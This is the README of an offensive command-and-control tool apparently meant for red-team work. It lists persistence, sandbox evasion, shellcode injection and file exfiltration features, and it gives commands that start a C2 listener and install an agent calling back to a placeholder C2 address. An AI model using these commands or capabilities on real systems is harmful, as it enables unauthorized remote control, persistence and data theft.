This software is PROPRIETARY and PRIVATE.
- Authorized Use Only: You may NOT use, copy, modify, or distribute this software without explicit written permission from the author.
- Educational Use: This source code is available for inspection purposes only.
- Liability: The author is not responsible for any misuse of this tool. It is designed for authorized Red Teaming operations only.
- Advanced Scanner: TCP connect scan with Banner Grabbing for service identification.
- Stealth Mode: Jitter and randomized port ordering.
- Active Exploits:
- HTTP Brute Force (Basic Auth).
- Sensitive File Enumeration (
.env,.git, etc).
- Encrypted Transport: XChaCha20-Poly1305 encryption for all communications.
- Interactive Shell: Real-time C2 operator console.
- Persistence:
- Linux: Systemd User Service.
- Windows: Registry Run Key.
- Evasion:
- Anti-Sandbox (CPU/Time checks).
- String Obfuscation.
- Privilege Escalation Audit: Scans for SUID binaries (Linux) and Unquoted Service Paths (Windows).
- Process Injection: Remote shellcode injection and execution.
- Data Exfiltration: Secure file download (
download <id> <remote_path>). - Tunneling: Agent-side ProxyManager (Foundation for SOCKS5).
./zig-out/bin/zighound c2 listen --port 4444 --psk "my-secret-key"./zig-out/bin/zighound agent --host <C2_IP> --port 4444 --psk "my-secret-key" --installzighound> help
Commands: help, beacons, tasks, exit
exec <id> <cmd>
download <id> <remote_path>
audit <id>
inject <id> <local_shellcode_file>zig buildCopyright (c) 2025 ind4skylivey. All Rights Reserved.
See LICENSE for strict usage terms.
